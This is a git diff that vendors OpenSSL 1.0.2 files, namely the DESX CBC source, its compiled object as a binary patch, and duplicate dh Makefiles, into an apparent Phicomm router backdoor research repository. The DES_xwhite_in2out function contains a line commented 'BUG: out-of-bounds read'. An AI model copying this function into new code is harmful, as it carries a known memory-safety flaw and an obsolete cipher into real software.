+    0x16, 0x38, 0xC4, 0x6F, 0x3B, 0x0F, 0x65, 0x46, 0xBE, 0x7E, 0x2D, 0x7B,
+    0x82, 0xF9, 0x40, 0xB5,
+    0x1D, 0x73, 0xF8, 0xEB, 0x26, 0xC7, 0x87, 0x97, 0x25, 0x54, 0xB1, 0x28,
+    0xAA, 0x98, 0x9D, 0xA5,
+    0x64, 0x6D, 0x7A, 0xD4, 0x10, 0x81, 0x44, 0xEF, 0x49, 0xD6, 0xAE, 0x2E,
+    0xDD, 0x76, 0x5C, 0x2F,
+    0xA7, 0x1C, 0xC9, 0x09, 0x69, 0x9A, 0x83, 0xCF, 0x29, 0x39, 0xB9, 0xE9,
+    0x4C, 0xFF, 0x43, 0xAB,
+};
+
+void DES_xwhite_in2out(const_DES_cblock *des_key, const_DES_cblock *in_white,
+                       DES_cblock *out_white)
+{
+    int out0, out1;
+    int i;
+    const unsigned char *key = &(*des_key)[0];
+    const unsigned char *in = &(*in_white)[0];
+    unsigned char *out = &(*out_white)[0];
+
+    out[0] = out[1] = out[2] = out[3] = out[4] = out[5] = out[6] = out[7] = 0;
+    out0 = out1 = 0;
+    for (i = 0; i < 8; i++) {
+        out[i] = key[i] ^ desx_white_in2out[out0 ^ out1];
+        out0 = out1;
+        out1 = (int)out[i & 0x07];
+    }
+
+    out0 = out[0];
+    out1 = out[i];              /* BUG: out-of-bounds read */
+    for (i = 0; i < 8; i++) {
+        out[i] = in[i] ^ desx_white_in2out[out0 ^ out1];
+        out0 = out1;
+        out1 = (int)out[i & 0x07];
+    }
+}
+#endif
+
+void DES_xcbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, DES_key_schedule *schedule,
+                      DES_cblock *ivec, const_DES_cblock *inw,
+                      const_DES_cblock *outw, int enc)
+{
+    register DES_LONG tin0, tin1;
+    register DES_LONG tout0, tout1, xor0, xor1;
+    register DES_LONG inW0, inW1, outW0, outW1;
+    register const unsigned char *in2;
+    register long l = length;
+    DES_LONG tin[2];
+    unsigned char *iv;
+
+    in2 = &(*inw)[0];
+    c2l(in2, inW0);
+    c2l(in2, inW1);
+    in2 = &(*outw)[0];
+    c2l(in2, outW0);
+    c2l(in2, outW1);
+
+    iv = &(*ivec)[0];
+
+    if (enc) {
+        c2l(iv, tout0);
+        c2l(iv, tout1);
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+            tin0 ^= tout0 ^ inW0;
+            tin[0] = tin0;
+            tin1 ^= tout1 ^ inW1;
+            tin[1] = tin1;
+            DES_encrypt1(tin, schedule, DES_ENCRYPT);
+            tout0 = tin[0] ^ outW0;
+            l2c(tout0, out);
+            tout1 = tin[1] ^ outW1;
+            l2c(tout1, out);
+        }
+        if (l != -8) {
+            c2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0 ^ inW0;
+            tin[0] = tin0;
+            tin1 ^= tout1 ^ inW1;
+            tin[1] = tin1;
+            DES_encrypt1(tin, schedule, DES_ENCRYPT);
+            tout0 = tin[0] ^ outW0;
+            l2c(tout0, out);
+            tout1 = tin[1] ^ outW1;
+            l2c(tout1, out);
+        }
+        iv = &(*ivec)[0];
+        l2c(tout0, iv);
+        l2c(tout1, iv);
+    } else {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        for (l -= 8; l > 0; l -= 8) {
+            c2l(in, tin0);
+            tin[0] = tin0 ^ outW0;
+            c2l(in, tin1);
+            tin[1] = tin1 ^ outW1;
+            DES_encrypt1(tin, schedule, DES_DECRYPT);
+            tout0 = tin[0] ^ xor0 ^ inW0;
+            tout1 = tin[1] ^ xor1 ^ inW1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            c2l(in, tin0);
+            tin[0] = tin0 ^ outW0;
+            c2l(in, tin1);
+            tin[1] = tin1 ^ outW1;
+            DES_encrypt1(tin, schedule, DES_DECRYPT);
+            tout0 = tin[0] ^ xor0 ^ inW0;
+            tout1 = tin[1] ^ xor1 ^ inW1;
+            l2cn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+
+        iv = &(*ivec)[0];
+        l2c(xor0, iv);
+        l2c(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    inW0 = inW1 = outW0 = outW1 = 0;
+    tin[0] = tin[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..2f90c27605239be0f6eeb88fb75aa38226b47bdd
GIT binary patch
literal 3504
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
TkHB3m`(cs)c$F=RcKd$;1|oV_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile
new file mode 100644
index 0000000..0e65e5c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile
@@ -0,0 +1,191 @@
+#
+# OpenSSL/crypto/dh/Makefile
+#
+
+DIR=	dh
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= dhtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dh_asn1.c dh_gen.c dh_key.c dh_lib.c dh_check.c dh_err.c dh_depr.c \
+	dh_ameth.c dh_pmeth.c dh_prn.c dh_rfc5114.c dh_kdf.c
+LIBOBJ= dh_asn1.o dh_gen.o dh_key.o dh_lib.o dh_check.o dh_err.o dh_depr.o \
+	dh_ameth.o dh_pmeth.o dh_prn.o dh_rfc5114.o dh_kdf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dh.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dh_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dh_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dh_ameth.o: ../../include/openssl/opensslconf.h
+dh_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dh_ameth.o: dh_ameth.c
+dh_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_asn1.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_asn1.c
+dh_check.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_check.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_check.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_check.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_check.o: ../../include/openssl/opensslconf.h
+dh_check.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_check.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_check.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_check.c
+dh_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_depr.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_depr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_depr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_depr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_depr.o: ../cryptlib.h dh_depr.c
+dh_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dh_err.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_err.o: dh_err.c
+dh_gen.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_gen.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_gen.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_gen.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_gen.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_gen.o: ../cryptlib.h dh_gen.c
+dh_kdf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_kdf.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_kdf.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_kdf.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+dh_kdf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_kdf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_kdf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_kdf.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_kdf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_kdf.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_kdf.o: ../../include/openssl/x509_vfy.h dh_kdf.c
+dh_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_key.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dh_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_key.c
+dh_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_lib.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_lib.o: ../cryptlib.h dh_lib.c
+dh_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_pmeth.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dh_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dh_pmeth.o: dh_pmeth.c
+dh_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_prn.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dh_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_prn.c
+dh_rfc5114.o: ../../e_os.h ../../include/openssl/bio.h
+dh_rfc5114.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_rfc5114.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_rfc5114.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_rfc5114.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dh_rfc5114.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_rfc5114.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_rfc5114.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_rfc5114.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.bak
new file mode 100644
index 0000000..0e65e5c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.bak
@@ -0,0 +1,191 @@
+#
+# OpenSSL/crypto/dh/Makefile
+#
+
+DIR=	dh
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= dhtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dh_asn1.c dh_gen.c dh_key.c dh_lib.c dh_check.c dh_err.c dh_depr.c \
+	dh_ameth.c dh_pmeth.c dh_prn.c dh_rfc5114.c dh_kdf.c
+LIBOBJ= dh_asn1.o dh_gen.o dh_key.o dh_lib.o dh_check.o dh_err.o dh_depr.o \
+	dh_ameth.o dh_pmeth.o dh_prn.o dh_rfc5114.o dh_kdf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dh.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dh_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dh_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dh_ameth.o: ../../include/openssl/opensslconf.h
+dh_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dh_ameth.o: dh_ameth.c
+dh_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dh_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_asn1.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_asn1.c
+dh_check.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_check.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_check.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_check.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_check.o: ../../include/openssl/opensslconf.h
+dh_check.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_check.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_check.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_check.c
+dh_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_depr.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_depr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_depr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_depr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_depr.o: ../cryptlib.h dh_depr.c
+dh_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dh_err.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_err.o: dh_err.c
+dh_gen.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_gen.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_gen.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_gen.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_gen.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_gen.o: ../cryptlib.h dh_gen.c
+dh_kdf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+dh_kdf.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dh_kdf.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+dh_kdf.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+dh_kdf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dh_kdf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dh_kdf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dh_kdf.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dh_kdf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dh_kdf.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dh_kdf.o: ../../include/openssl/x509_vfy.h dh_kdf.c
+dh_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_key.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dh_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dh_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dh_key.c
+dh_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dh_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dh_lib.o: ../../include/openssl/dh.h ../../include/openssl/e_os2.h
+dh_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dh_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dh_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dh_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dh_lib.o: ../cryptlib.h dh_lib.c
+dh_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dh_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dh_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dh_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
